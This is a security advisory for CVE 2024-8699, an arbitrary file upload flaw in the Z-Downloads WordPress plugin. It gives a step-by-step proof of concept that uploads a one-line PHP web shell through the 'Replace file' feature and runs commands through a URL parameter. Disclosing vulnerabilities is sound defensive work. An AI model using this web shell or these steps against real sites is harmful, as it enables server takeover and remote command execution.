Z-Downloads < 1.11.5 – Admin+ Arbitrary File Upload | CVE 2024-8699

Description

The plugin does not properly validate files uploaded, allowing high privilege users such as admin to upload arbitrary files on the server even when they should not be allowed to (for example in multisite setup)

Proof of Concept

1. Navigate to the Z-Downloads plugin 
2. Add/upload a file. This can be any file, such as PNG. Once file is uploaded, you'll see the following tabs:
3. Click on the "Replace file" functionaliy and upload a PHP webshell. For example, the following contents can be added to a file called `shell.php` and uploaded:
`<?php system($_REQUEST[0]); ?>`
4. Navigate to the Logs section under Z-Downloads to find the file location.
5. Go to this file location to execute the web shell. For example: http://example.com/wp-content/uploads/z-downloads-90f12c374230f0942f2e47c71559382d/files/ad6d0f6fb8fbcb60c420fdae03f6c1ec/shell.php?0=id